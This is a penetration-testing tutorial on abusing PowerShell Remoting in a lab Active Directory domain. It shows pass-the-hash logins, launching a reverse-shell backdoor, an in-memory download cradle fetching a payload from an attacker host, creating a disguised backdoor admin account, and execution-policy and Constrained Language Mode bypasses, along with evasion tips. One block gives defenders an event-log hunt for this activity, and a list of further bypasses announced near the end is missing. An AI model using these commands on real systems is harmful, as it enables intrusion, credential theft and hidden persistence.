PowerShell Remoting for Hackers: Domain Takeover in 2025

PowerShell Remoting

PowerShell Remoting is a native Windows feature that can be used to take over entire enterprises. It allows you to pivot between machines, automate hacking tasks, and control Windows environments while blending in with the administration traffic defenders expect to see. 

This comprehensive guide will teach you about PowerShell Remoting and how to use it to start interactive sessions, execute remote commands, and run complete PowerShell scripts against multiple machines. 

You’ll also see how it can be used for common penetration testing actions like lateral movement, privilege escalation, and establishing persistence while evading detection.

Let’s jump straight in and learn how to do PSRemoting.

What Is PowerShell Remoting? 

PowerShell Remoting is a feature of Windows PowerShell that allows system administrators to execute commands and scripts on machines in their Windows environment remotely. This is similar to running commands or scripts using SSH on Linux servers.

It’s designed for IT admins to perform remote management and automation tasks on systems in an enterprise environment. 

With a single command or script, you can update software, change configuration settings, or edit services across multiple machines. SOC analysts or responders can also use it to collect logs for analysis or perform remediation actions quickly. 

In summary, PowerShell Remoting has the following key features:

Remote command execution: Run commands or scripts on remote systems.
Interactive sessions: Start an interactive remote session and run commands as if you were sitting at a local PowerShell prompt. 
Script execution: Run complete PowerShell scripts on many machines at once, and run them as background jobs (-AsJob) when you want them to execute asynchronously.
Secure transport: Traffic rides on WinRM (WS-Management over HTTP on TCP 5985 or HTTPS on TCP 5986). With Kerberos or NTLM authentication the payload is encrypted at the message level even on the plain HTTP listener.
Scalable: Use PowerShell Remoting across hundreds of machines concurrently, allowing you to control and manage fleets of enterprise workstations and servers.

These features make PowerShell Remoting great for IT admins. However, it can also be used by penetration testers to perform security tests on systems or by hackers during a cyber attack.

In the following section, we’ll look at how PowerShell remoting can be used for pentesting.

Execute Commands Remotely

PowerShell Remoting allows you to execute commands and scripts on remote systems. This means you don’t need to sit in front of the workstation you’re targeting to perform attacks. Once you’re inside the network, you can reach any machine that exposes WinRM and accepts the credentials you hold. 

Stealth and Evasion

PowerShell is built into modern Windows systems, and PowerShell Remoting is a legitimate feature IT staff use to administer machines. This means attackers can use this native technology to blend in with legitimate traffic, reduce the need to upload additional hacking tools, and fly under the radar of defenders.

Also, PowerShell Remoting traffic is encrypted, which blinds network inspection to the commands you send. Be clear about what that does not cover: on the endpoint, the WinRM and PowerShell operational logs, the network logon (Security Event ID 4624, logon type 3) and the wsmprovhost.exe process that hosts each remote session are all still recorded.

Automated Reconnaissance and Exploitation

PowerShell Remoting allows you to execute entire PowerShell scripts against hundreds of machines at once. This is perfect for automating common reconnaissance and exploitation tasks like scanning network ports, finding vulnerable machines, and password spraying. Automating saves you time and energy.

Post-Exploitation Activities

After gaining initial access, hackers perform post-exploitation activities such as setting up persistence, harvesting credentials, exfiltrating data, and moving laterally. Again, PowerShell Remoting is an excellent tool here thanks to its remote code execution, its native presence in Windows environments, and its automation capabilities. 

Set Up and Enable PowerShell Remoting

PowerShell Remoting is disabled by default on Windows client editions (Windows 10 and 11), while Windows Server 2012 and later ship with it enabled. To enable it, open a PowerShell terminal as an Administrator and execute Enable-PSRemoting -Force. This starts the WinRM service, registers the default session configurations, creates the HTTP listener on TCP 5985, and adds the Windows Firewall rule that allows WinRM traffic.

If you already have administrative WMI access to the target (RPC on TCP 135 plus DCOM reachable), you can turn remoting on from a distance with wmic /node:<RemoteHost> process call create "powershell enable-psremoting -force". Note that WMIC is deprecated and removed from recent Windows builds; the same Win32_Process Create call is available through the CIM cmdlets.

If both machines are domain-joined and you connect by hostname, Kerberos handles authentication and this is all you need. 

However, Kerberos only works when both sides are in the same (or a trusting) domain and you address the target by name. If you connect from a machine outside the domain, or by IP address, authentication falls back to NTLM, and a Windows client will refuse to send your credentials to a target it has not been told to trust. Your Kali Linux machine is the classic example of such an “untrusted host.”

TrustedHosts is the client-side fix for this. It is configured on the machine you connect from (not on the target) and lists the targets you are willing to authenticate to over NTLM. You can name a single host or, for a throwaway lab, trust everything with a wildcard (*):

  • To trust one target, run Set-Item wsman:\localhost\Client\TrustedHosts -Value "<TargetIpOrName>" (add -Concatenate to append instead of overwrite).
  • To trust every host, run Set-Item wsman:\localhost\Client\TrustedHosts -Value "*". Use this only in controlled testing environments: on a production estate it means the client will hand NTLM credentials to anything that answers on port 5985.

Run these commands from an Administrator PowerShell on the connecting Windows machine. Linux clients such as evil-winrm and pwsh do not enforce a TrustedHosts list, so nothing needs to change there. On the target side, Enable-PSRemoting leaves Negotiate (and therefore NTLM) enabled on the WinRM service, so no extra configuration is required for these connections to be accepted.

To test your connection from a Kali Linux machine, you can use the built-in evil-winrm tool. Run the command evil-winrm -i <target-ip> -u <username> -p <password> to see if you can connect to the target machine using the WinRM protocol.

If successful, you can use PowerShell Remoting to execute PowerShell commands and scripts. 
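The steps above, worked through end to end as an added example (this is not code from the original article). The target IP, the account name and the lab domain are assumptions; every cmdlet used is a stock Windows PowerShell cmdlet:

```powershell
# Added example (not from the original article): enable and verify WinRM on a
# lab target, then configure the Windows *client* you attack from.
# The IP 10.0.200.25 and the account STATIONX\adam are lab assumptions.

# --- On the target (elevated PowerShell) ---
Enable-PSRemoting -Force    # starts WinRM, adds the HTTP listener (TCP 5985) and the firewall rule

# Confirm what Enable-PSRemoting produced: listener, auth methods, firewall rule.
Get-ChildItem WSMan:\localhost\Listener | Select-Object Name, Keys
Get-ChildItem WSMan:\localhost\Service\Auth        # Kerberos/Negotiate True, Basic False by default
Get-NetFirewallRule -DisplayGroup 'Windows Remote Management' |
    Select-Object Name, Enabled, Profile

# Who may connect to the default endpoint: Administrators and Remote Management Users.
(Get-PSSessionConfiguration -Name Microsoft.PowerShell).Permission

# --- On the Windows client you connect from (elevated PowerShell) ---
# TrustedHosts is a CLIENT-side list of targets you will send NTLM credentials to.
# It is only needed when Kerberos cannot be used: IP address, workgroup target,
# or a client that is not a member of the domain.
$target = '10.0.200.25'
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $target -Concatenate -Force
Get-Item WSMan:\localhost\Client\TrustedHosts      # verify; a '*' here on a real estate is a finding

# Reachability first, then a real authenticated WS-Management handshake,
# before you spend time troubleshooting Enter-PSSession.
Test-NetConnection -ComputerName $target -Port 5985
$cred = Get-Credential 'STATIONX\adam'
Test-WSMan -ComputerName $target -Authentication Negotiate -Credential $cred
```

Test-WSMan is the quickest way to separate the three usual failure causes: a firewall or missing listener (Test-NetConnection fails), a TrustedHosts problem (the client refuses before sending anything), and bad credentials or a disabled authentication method (the server answers with an access-denied or authentication error).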

The demonstrations in this article use a custom-built Windows Active Directory hacking lab and assume you were able to steal the credentials of an Active Directory user to access the environment. Read How to Create a Virtual Hacking Lab: Ultimate Setup to learn how to build your own hacking lab.

How to Use PowerShell Remoting: Commands

Once PowerShell Remoting has been enabled on the target machine, you can start running remote PowerShell commands. 

Firstly, to establish a PowerShell Remoting session with the target, open a PowerShell terminal on your Kali Linux machine using the dropdown menu at the top of the GUI.

Next, run Enter-PSSession -ComputerName <target-ip> -Authentication Negotiate -Credential <username>. The -Authentication Negotiate option is what makes connecting by IP address work: it lets the client fall back from Kerberos to NTLM. (PowerShell on Linux needs a WSMan client library for this; recent pwsh builds get one from the PSWSMan module.) The cmdlet connects to the target and prompts for the password of the specified user, and entering it drops you into a remote PowerShell session on the target machine. 

Once you’ve established a PowerShell Remoting session, you can interact with the target machine just like you had opened a PowerShell terminal locally. 

PowerShell Remoting Scripts

PowerShell commands are great, but you probably don’t want to run them interactively, one by one every time. 

Good news: PowerShell Remoting lets you bundle your commands into a script block or a script file and run them through a reusable session, and with -AsJob the run happens asynchronously in the background while you carry on working.         

First, create a PowerShell variable to hold the PowerShell Remoting session with the command $ps_session = New-PSSession  -ComputerName <target-ip> -Authentication Negotiate -Credential <username>. This allows you to reference the variable whenever you want to run PowerShell commands or scripts on the remote machine.

Next, use the Invoke-Command cmdlet with the -Session and -ScriptBlock options to run several PowerShell commands at once. For example, Invoke-Command -Session $ps_session -ScriptBlock {hostname; whoami; Get-Process;} will return the hostname of the machine (1), the user you’re logged in as (2), and the list of running processes (3): the basic host reconnaissance in one command. The results come back as objects rather than text, so you can filter and sort them locally.

To execute a PowerShell script rather than a script block, use the -FilePath option followed by the path to the script you want to run. For instance, Invoke-Command -Session $ps_session -FilePath /home/adam/host-recon.ps1. The path is on your own machine: Invoke-Command reads the file locally and sends its contents through the session, so the script never has to be written to the target’s disk.

Here, the host-recon.ps1 script contains the same PowerShell commands as before, just in a script rather than listed individually. Check out PowerSploit for excellent PowerShell hacking scripts to run during a penetration test.
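The fan-out version of the recon above, as an added example (not code from the original article): one script block run against several hosts in parallel, results kept as objects tagged by host, and the -AsJob variant. The hostnames and account are lab assumptions; host-recon.ps1 is the article’s script, assumed to be in the current directory.

```powershell
# Added example (not from the original article): run one recon block against
# many hosts, keep results tagged by host, and clean up afterwards.
# Hostnames and the account are lab assumptions; host-recon.ps1 is the
# article's own script, assumed to sit in the current directory.
$targets = 'ws01.stationx.local', 'ws02.stationx.local', 'srv01.stationx.local'
$cred    = Get-Credential 'STATIONX\adam'

# One call opens all sessions. Unreachable hosts become non-terminating errors
# collected in $connErr instead of aborting the whole run.
$sessions = New-PSSession -ComputerName $targets -Credential $cred `
                          -ErrorAction SilentlyContinue -ErrorVariable connErr
$connErr | ForEach-Object { Write-Warning $_.Exception.Message }

# Return objects, not text. Each result is stamped with PSComputerName, so the
# output of 3 or 300 hosts sorts and filters as a single table.
$recon = Invoke-Command -Session $sessions -ThrottleLimit 32 -ScriptBlock {
    $os = Get-CimInstance Win32_OperatingSystem
    [pscustomobject]@{
        User        = [Security.Principal.WindowsIdentity]::GetCurrent().Name
        OS          = $os.Caption
        LastBoot    = $os.LastBootUpTime
        LocalAdmins = (Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue).Name -join ';'
        Processes   = (Get-Process).Count
    }
}
$recon | Sort-Object PSComputerName |
         Format-Table PSComputerName, User, OS, LocalAdmins -AutoSize

# Values from your side go into the remote block with $using: (or -ArgumentList).
$needle = 'lsass|mimikatz|procdump'
Invoke-Command -Session $sessions -ScriptBlock {
    Get-Process | Where-Object Name -match $using:needle | Select-Object Name, Id
}

# Asynchronous variant: -AsJob returns at once. The script file is read on YOUR
# machine and its text is sent through the channel, never copied to the target.
$job = Invoke-Command -Session $sessions -FilePath .\host-recon.ps1 -AsJob
Wait-Job $job | Out-Null
$jobOut = Receive-Job $job -Keep
$jobOut | Group-Object PSComputerName | Select-Object Name, Count

Remove-PSSession -Session $sessions   # leave no idle sessions behind for defenders to find
```

Returning a [pscustomobject] from the remote block instead of raw hostname/whoami text is what makes the multi-host case manageable: the same Where-Object and Sort-Object you would use locally work across the whole fleet’s output.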

PowerShell Remoting Session Management

You just saw how Enter-PSSession creates an interactive session and how New-PSSession creates a session you can reuse with Invoke-Command. Both belong to the PowerShell Remoting session management cmdlets. The ones you will use most are:

  • Enter-PSSession: starts an interactive session with a remote computer where you run commands directly. Example: Enter-PSSession -ComputerName <RemoteComputerName>
  • Exit-PSSession: ends an interactive session started with Enter-PSSession. Example: Exit-PSSession
  • New-PSSession: creates persistent connections to one or more computers that you can run multiple commands through. Example: $session = New-PSSession -ComputerName <RemoteComputerName>
  • Get-PSSession: lists the sessions currently available in your local PowerShell. Example: Get-PSSession
  • Disconnect-PSSession and Connect-PSSession: detach from a session without ending it and reattach later. The remote side keeps running, which also means a session you walk away from stays alive on the target.
  • Remove-PSSession: closes one or more sessions created by New-PSSession. Example: Remove-PSSession -Session $session

PowerShell Remoting for Hackers

PowerShell Remoting is a powerful feature that system administrators can use to manage systems, but hackers can also abuse it. 

Malicious actors can use PowerShell Remoting to perform lateral movement, escalate their privileges, install persistence mechanisms, and evade detection. 

Let’s explore how you can do this during a penetration test.

PowerShell Remoting for Lateral Movement

Lateral movement is a key step in any penetration test, and PowerShell Remoting can make it very easy. 

You just need to steal credentials from a compromised system using a tool like Mimikatz or Meterpreter: plaintext passwords, NTLM hashes, or Kerberos tickets. Then, use these credentials to authenticate to other systems using PowerShell Remoting. 

For example, below, the stolen NTLM hash of the StationX admin account is used with the evil-winrm hacking tool to perform a pass-the-hash attack over WinRM. The command is evil-winrm -i <target-ip> -u <username> -H <hash>. This works because the target’s WinRM service accepts NTLM; a Kerberos-only configuration would require a ticket rather than a hash.

PowerShell Remoting lets you start interactive sessions as other users, execute scripts, or run commands on multiple systems across the entire Active Directory network. You’re limited only by what the stolen credentials can access and by where WinRM is enabled. 
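Moving one hop further with stolen credentials runs into the “second hop” problem, which the article’s single-hop examples do not show. The following is an added example, not code from the original article; the hostnames, account and password are lab assumptions.

```powershell
# Added example (not from the original article): lateral movement with stolen
# credentials across two hops. Hosts, account and password are lab assumptions.
$sec  = ConvertTo-SecureString 'Winter2025!' -AsPlainText -Force   # stolen plaintext (lab value)
$cred = [pscredential]::new('STATIONX\svc_backup', $sec)

# Hop 1. The remote session is a NETWORK logon (Security 4624, logon type 3):
# the target is handed proof of identity, not a reusable secret, so the token
# it builds for you cannot be forwarded to a third machine.
Invoke-Command -ComputerName ws01.stationx.local -Credential $cred -ScriptBlock {
    "hop 1 running as $(whoami) on $env:COMPUTERNAME"

    # Hop 2 WITHOUT credentials fails: ws01 has nothing it can present to srv01
    # on your behalf (the classic double-hop failure).
    try {
        Invoke-Command -ComputerName srv01.stationx.local -ErrorAction Stop -ScriptBlock { hostname }
    } catch {
        "hop 2 without credential failed as expected: $($_.Exception.Message)"
    }

    # Hop 2 WITH the credential passed into the remote block via $using: works.
    # srv01 now records a fresh type-3 logon whose source is ws01, not you.
    Invoke-Command -ComputerName srv01.stationx.local -Credential $using:cred -ScriptBlock {
        "hop 2 running as $(whoami) on $env:COMPUTERNAME"
    }
}
```

The same property has a defensive side worth remembering: because your remoting session is a network logon, your own credentials are not cached on the machines you touch, and the logon source IP in Event 4624 on each hop points back at the machine you hopped from.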

PowerShell Remoting for Privilege Escalation

PowerShell Remoting does not escalate privileges by itself: a remote session runs with whatever rights the account you authenticated as holds on that machine. What it gives you is arbitrary command execution in that context, which is where escalation starts. 

You can run individual checks for privilege escalation opportunities or push entire enumeration scripts that look for them automatically.

For instance, many post-exploitation activities during a penetration test require elevated privileges, such as checking for misconfigurations, installing persistence mechanisms, or exfiltrating sensitive data. 

You can start an elevated reverse shell through PowerShell Remoting with the command Invoke-Command -Session $ps_session -ScriptBlock { Start-Process "C:\Users\stationx-admin\Downloads\backdoor.exe" -Verb RunAs }.

The -Verb RunAs parameter requests elevation, but in a non-interactive remote session there is no UAC prompt to answer, so it is not what does the work here. What matters is the token the session already holds: a domain account that is a member of the target’s local Administrators group receives a full, unfiltered administrative token for its network logon (UAC token filtering only applies to local accounts other than the built-in Administrator). backdoor.exe inherits that token, so in this case you get an administrator reverse shell on the target that you can use for post-exploitation tasks such as escalating to the SYSTEM account. 

Below, this reverse shell is caught using Metasploit, and the getsystem Meterpreter command succeeds because the shell is already running with administrative privileges.

The commands demonstrated here run against a Windows 10 machine with Microsoft Defender and SmartScreen disabled.
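Before launching anything that needs administrative rights, it pays to establish what the remote session is actually running as. This is an added example, not code from the original article; $ps_session is the session variable created earlier in the article.

```powershell
# Added example (not from the original article): establish the privilege level
# of the remote session before attempting anything that needs admin.
# $ps_session is the session created earlier with New-PSSession.
$ctx = Invoke-Command -Session $ps_session -ScriptBlock {
    $id    = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sids  = $id.Groups.Value            # group SIDs plus the integrity-level SID of the token
    $privs = whoami /priv /fo csv | ConvertFrom-Csv |
             Where-Object State -eq 'Enabled' |
             Select-Object -ExpandProperty 'Privilege Name'
    [pscustomobject]@{
        User          = $id.Name
        LocalAdmin    = $sids -contains 'S-1-5-32-544'   # BUILTIN\Administrators present in the token
        HighIntegrity = $sids -contains 'S-1-16-12288'   # High Mandatory Level: UAC did not filter it
        IsSystem      = $sids -contains 'S-1-16-16384'   # System Mandatory Level
        EnabledPrivs  = $privs -join ', '
    }
}

$ctx | Format-List

if ($ctx.IsSystem) {
    'Already SYSTEM; nothing to escalate.'
} elseif ($ctx.LocalAdmin -and $ctx.HighIntegrity) {
    'Full administrative token: services, LSASS and a jump to SYSTEM are reachable from here.'
} elseif ($ctx.LocalAdmin) {
    'Administrators SID present but not high integrity: the token was filtered (UAC); expect access denied.'
} else {
    'Standard user: run local privilege escalation enumeration first.'
}
```

The integrity-level SID is the reliable tell. Seeing BUILTIN\Administrators in whoami /groups is not enough on its own, because a UAC-filtered token still lists the group (marked deny-only) while running at medium integrity.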

PowerShell Remoting for Persistence

A common post-exploitation task is installing persistence mechanisms that allow you to maintain access to a target machine even when the user logs out or reboots the system. 

You can use various persistence mechanisms, such as creating a Windows Startup folder script that connects to your command and control (C2) server, installing a malicious service, or using a registry run key. 

A common persistence mechanism in cyber attacks is the creation of new user accounts in the target environment. You can do this using PowerShell Remoting with the command Invoke-Command -Session $ps_session -ScriptBlock { net user <username> <password>  /add }.

Here, a new local user (named hacker in the lab) is created, and you can use it as a backdoor to log in to this system. You could also add it to privileged groups, such as the local Administrators group, to give it more access within the target environment. 

Just ensure the account you use for PowerShell Remoting has the required permissions (local administrator on the target) to add the new user. Be aware that the action is logged: Security Event ID 4720 records the account creation and 4732 records the group addition, and both are common alert triggers.
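A version of the same persistence step using the LocalAccounts cmdlets (Windows 10 and Server 2016 onwards) instead of net user, as an added example that is not from the original article. The account name and password are lab assumptions; the point it adds is that membership in Remote Management Users is what lets the backdoor account connect over WinRM in its own right.

```powershell
# Added example (not from the original article): create a backdoor local account
# and make it usable over WinRM itself. Account name and password are lab values.
# Requires that the remoting account is a local administrator on the target.
Invoke-Command -Session $ps_session -ScriptBlock {
    $name = 'svc_health'                    # blends in better than 'hacker'
    $pw   = ConvertTo-SecureString 'L0ngR@ndomP@ss!2025' -AsPlainText -Force
    try {
        New-LocalUser -Name $name -Password $pw -PasswordNeverExpires -AccountNeverExpires `
                      -Description 'Health monitoring service' -ErrorAction Stop | Out-Null

        # Administrators gives full control. Remote Management Users is the group the
        # default PowerShell endpoint's ACL trusts, so the account can PSRemote in directly.
        Add-LocalGroupMember -Group 'Administrators'          -Member $name -ErrorAction Stop
        Add-LocalGroupMember -Group 'Remote Management Users' -Member $name -ErrorAction Stop

        # On a domain-joined target, local admins other than the built-in Administrator get a
        # UAC-filtered (non-admin) token over the network unless this policy value is 1.
        $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
                                -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue

        [pscustomobject]@{
            Created         = (Get-LocalUser -Name $name).Enabled
            InAdmins        = [bool](Get-LocalGroupMember -Group 'Administrators' | Where-Object Name -like "*\$name")
            InRemoteMgmt    = [bool](Get-LocalGroupMember -Group 'Remote Management Users' | Where-Object Name -like "*\$name")
            TokenFilterOff  = ($pol.LocalAccountTokenFilterPolicy -eq 1)   # $false means remote admin via this account will be filtered
        }
    } catch {
        Write-Warning "Persistence failed on $env:COMPUTERNAME: $($_.Exception.Message)"
    }
}
```

If TokenFilterOff comes back $false, the account will still connect over WinRM (it is in Remote Management Users) but will land in a filtered, non-administrative session; in that case a domain account or a different persistence mechanism is the better choice.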

Avoiding Detection

As mentioned, lateral movement is a key step in any penetration test. However, usually, this requires you to use a C2 framework like PowerShell Empire and install a C2 agent on each machine you move to so you can interact with it. 

This is where most penetration tests get detected. Anti-virus software or an Endpoint Detection and Response (EDR) tool will scan the machine and detect if malicious software is present (e.g., your C2 agent). 

It will then quarantine or remove this malware, and your access will be lost. To avoid this, penetration testers and red teamers spend days or weeks writing custom C2 implants that can evade detection. 

If this sounds like a lot of work, don’t worry: this is where PowerShell Remoting shines. Your remoting sessions, commands, and scripts execute inside the target’s wsmprovhost.exe process, and nothing you send has to be written to disk. 

That defeats file-based signature scanning, so you can move laterally without an implant for the EDR to quarantine. It does not make you invisible, though: AMSI inspects script content as it is submitted, Script Block Logging (Event ID 4104) records the de-obfuscated text of what you ran, and each session leaves a network logon (Event ID 4624, type 3) and a wsmprovhost.exe process behind it. 

Still, because PowerShell Remoting is so common in enterprise environments, your activity has a good chance of reading as routine administration to defenders, unlike a tool like PsExec.

PsExec is not pre-installed on most workstations or servers, and it announces itself by installing a service (PSEXESVC) on every target it touches, so your chances of blending into the environment are lower than with PowerShell Remoting.

One way to use PowerShell Remoting to remain undetected is to download and execute PowerShell scripts completely in memory on a target machine. 

For instance, this command uses a PowerShell download cradle to download and execute a Meterpreter reverse shell entirely in memory: Invoke-Command -Session $ps_session -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://10.0.200.17:8000/backdoor.ps1') }.

Because the script block runs on the target, it is the target (not your machine) that fetches backdoor.ps1 from the attacker host (10.0.200.17). The script is executed from memory without ever being saved as a file, sidestepping scanners that only look at what lands on disk, and a fully interactive shell connects back to your attack machine.

This is just a reverse shell. You could also download and execute data exfiltration scripts, C2 agents, or any other malware that allows you to achieve your objectives. 
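The other side of the in-memory argument is what the defender can still see. The following is an added example (not from the original article) of the hunt a SOC analyst would run on the target or a log collector to surface exactly the activity described above. It assumes Script Block Logging (Event ID 4104) and process creation auditing (Event ID 4688) are enabled, as they are in most enterprise baselines.

```powershell
# Added example (not from the original article): what the defender sees after the
# remoting activity above. Assumes Script Block Logging (4104) and process creation
# auditing (4688) are enabled. Run on the target or against collected logs.
function Get-EventDataField {
    # Pull a named <Data> field out of an event's XML; more robust than Properties[n].
    param($Event, [string]$Name)
    $x = [xml]$Event.ToXml()
    ($x.Event.EventData.Data | Where-Object Name -eq $Name).'#text'
}

$since = (Get-Date).AddHours(-24)

# 1. Script blocks that look like download cradles. 4104 logs the de-obfuscated
#    text, so "ran in memory" does not mean "ran unlogged".
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventDataField $_ 'ScriptBlockText') -match 'DownloadString|IEX|Invoke-Expression|Net\.WebClient|FromBase64String' } |
    Select-Object TimeCreated, @{ n = 'Script'; e = { (Get-EventDataField $_ 'ScriptBlockText') -replace '\s+', ' ' } } |
    Format-Table -Wrap

# 2. wsmprovhost.exe hosts every incoming PowerShell Remoting session. Anything it
#    spawns (net.exe, powershell.exe, backdoor.exe) was started by a remote operator.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventDataField $_ 'ParentProcessName') -like '*\wsmprovhost.exe' } |
    Select-Object TimeCreated,
        @{ n = 'User';  e = { "$(Get-EventDataField $_ 'SubjectDomainName')\$(Get-EventDataField $_ 'SubjectUserName')" } },
        @{ n = 'Child'; e = { Get-EventDataField $_ 'NewProcessName' } } |
    Format-Table -AutoSize

# 3. Who connected from where: network logons (type 3) via Kerberos or NTLM, counted
#    per account and source address. Pass-the-hash shows up as NtLmSsp logons here.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventDataField $_ 'LogonType') -eq '3' -and
                   (Get-EventDataField $_ 'AuthenticationPackageName') -match 'Kerberos|NTLM' } |
    Select-Object @{ n = 'Account'; e = { Get-EventDataField $_ 'TargetUserName' } },
                  @{ n = 'From';    e = { Get-EventDataField $_ 'IpAddress' } } |
    Group-Object Account, From -NoElement | Sort-Object Count -Descending
```

Correlating the three is the detection: a type-3 logon from a workstation that is not an admin jump host, followed within seconds by a wsmprovhost.exe child process and a 4104 entry containing a download cradle, is a much stronger signal than any one of them alone.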

However, before getting ahead of yourself, remember that PowerShell Remoting has some limitations, especially if Constrained Language Mode is enabled. 

Execution policy is a different matter and much less of an obstacle than it looks. It only governs .ps1 files run on the target, it is not a security boundary, and a download cradle that hands text to IEX never consults it. If a script file is blocked, Set-ExecutionPolicy (or powershell.exe’s -ExecutionPolicy Bypass parameter) sidesteps it; CLM cannot be waved away like that.

Constrained Language Mode

Constrained Language Mode (CLM) is a PowerShell security feature that restricts what a session can do. It blocks the language features offensive tooling leans on: creating arbitrary .NET objects and calling methods on them, Add-Type, COM objects, and invoking script that the system’s policy has not approved. 

That matters because in-memory tradecraft such as Invoke-Mimikatz reaches into the Local Security Authority Subsystem Service (LSASS) through .NET and Win32 API calls made from PowerShell. With CLM in place those calls fail long before they get near any credentials, which shuts down credential harvesting from the session.

CLM is normally enforced by an application control policy (AppLocker or Windows Defender Application Control) that covers scripts: scripts the policy allows run in FullLanguage, while everything else, including what you type into a remote session, runs constrained. The __PSLockdownPolicy environment variable can also switch it on, but that variant is not a security boundary. Either way, it severely limits your PowerShell Remoting capabilities.

You can execute the PowerShell command $ExecutionContext.SessionState.LanguageMode inside the remote session to detect if CLM is enabled.

This returns the language mode of the current session, which is one of:

  • FullLanguage: the default for ordinary sessions. All cmdlets, language features, and .NET types are available.
  • RestrictedLanguage: a minimal mode used for data files (.psd1) and similar. Only a handful of cmdlets and operators, a fixed set of variables, and no script blocks or .NET types.
  • NoLanguage: no script text is accepted at all; the session can only invoke the commands exposed to it through the API. A Just Enough Administration (JEA) endpoint drops you here.
  • ConstrainedLanguage: scripting works, but arbitrary .NET types, method calls on non-core types, Add-Type, and COM are blocked. Enough for basic administrative tasks, too little for most offensive tooling.

If you find CLM is enabled on the machine you’re PowerShell Remoting to, you can try several bypass methods. 

The easiest way to bypass CLM is to drop into the PowerShell 2.0 engine, which predates CLM enforcement (as well as AMSI and Script Block Logging), with the command powershell -version 2.
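A probe that settles both questions in one pass, as an added example (not code from the original article): which mode the remote session is in, what that mode concretely blocks, how it is being enforced, and whether the 2.0 engine the downgrade depends on is even present. $ps_session is the session variable from earlier in the article.

```powershell
# Added example (not from the original article): probe the remote session's
# language mode, confirm what it blocks, identify the enforcement source, and
# test whether the PowerShell 2.0 engine is available for a downgrade.
# $ps_session is the session created earlier with New-PSSession.
$probe = Invoke-Command -Session $ps_session -ScriptBlock {
    $mode = $ExecutionContext.SessionState.LanguageMode

    # In ConstrainedLanguage arbitrary .NET types cannot be instantiated, which is
    # exactly why the Net.WebClient download cradle dies in such a session.
    $webClient = try { $null = New-Object System.Net.WebClient; 'allowed' }
                 catch { $_.Exception.Message }

    # Add-Type (compiling C# in-process) is another capability CLM removes.
    $addType = try { Add-Type -TypeDefinition "public class Probe$(Get-Random) {}" -ErrorAction Stop; 'allowed' }
               catch { $_.Exception.Message }

    # Enforcement source: the env var is the weak way, AppLocker/WDAC the robust one.
    $lockdown  = $env:__PSLockdownPolicy
    $appLocker = try {
        (Get-AppLockerPolicy -Effective -ErrorAction Stop).RuleCollections |
            Where-Object RuleCollectionType -eq 'Script' |
            Select-Object -ExpandProperty EnforcementMode
    } catch { 'n/a' }

    # v2 engine present? powershell.exe -Version 2 fails (stderr, non-zero exit) when the
    # optional feature / .NET 3.5 is missing; otherwise it reports major version 2.
    $v2 = & "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" `
            -Version 2 -NoProfile -Command '$PSVersionTable.PSVersion.Major' 2>$null

    [pscustomobject]@{
        LanguageMode        = $mode
        NewObjectWebClient  = $webClient
        AddType             = $addType
        PSLockdownPolicyEnv = $lockdown
        AppLockerScriptMode = $appLocker
        V2EngineAvailable   = ($v2 -eq '2')
    }
}
$probe | Format-List
```

Reading the result: ConstrainedLanguage with AppLockerScriptMode reporting Enabled means the policy, not a stray environment variable, is enforcing the restriction, and V2EngineAvailable set to $false means the downgrade described above is off the table on this host.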

Downgrading requires the 2.0 engine to be present on the target, which means .NET Framework 3.5 and the Windows PowerShell 2.0 optional feature, deprecated since Windows 10 version 1709 and often absent on current builds. If this isn’t the case, there are other CLM bypasses, including: 

Let’s see how PowerShell Remoting compares to another tool commonly used for lateral movement in Windows environments.

PowerShell Remoting vs PsExec

PsExec is another popular tool frequently used by threat actors to perform lateral movement, escalate privileges, and execute remote code. 

This command-line utility is part of Microsoft's Sysinternals suite. It’s lightweight and standalone, and system administrators often install it in enterprise environments. 

PsExec shares many similarities with PowerShell Remoting. They work well in Windows environments, blend in with legitimate administrator work, and are great for post-exploitation tasks. 

The differences are in how they work. PsExec copies its PSEXESVC service binary to the target’s ADMIN$ share over SMB, installs and starts it as a service, and relays your command’s input and output through a named pipe. 

It can run a command on several hosts, copy an executable across with -c, and give you an interactive cmd.exe, but every run leaves a service installation (System Event ID 7045) and a binary on disk, it needs SMB and the administrative shares reachable, and it hands you text rather than objects you can filter and reuse across hosts. It suits quick, one-off tasks with minimal setup. 

PowerShell Remoting is the way to go if you want persistent sessions, fan-out to many hosts, and structured output. The open questions are whether WinRM is enabled in the environment you’re targeting and whether you can work within or around PowerShell protections like CLM. 

Conclusion

PowerShell Remoting is a powerful Windows feature that allows you to perform lateral movement, escalate privilege, and install persistence mechanisms. 

This guide demonstrated how to use it to start interactive sessions, run ad-hoc commands, and execute entire PowerShell scripts that can automate many hacking tasks. 

You’ve also seen how to use PowerShell Remoting to evade detection, discovered tips on bypassing PowerShell’s Constrained Language Mode (CLM), and learned how PowerShell Remoting stacks up against PsExec. 

We encourage you to set up your hacking lab and play with this Windows feature's awesome capabilities.

If you want to learn more about PowerShell, Windows Active Directory, or penetration testing in general, join our StationX Accelerator Program. It includes everything you need to crush it in cyber security with 1000+ courses and labs, mentorship, and mastermind groups. 


  • Adam is a seasoned cyber security professional with extensive experience in cyber threat intelligence and threat hunting. He enjoys learning new tools and technologies, and holds numerous industry qualifications on both the red and blue sides. Adam aims to share the unique insights he has gained from his experiences through his blog articles. You can find Adam on LinkedIn or check out his other projects on LinkTree.
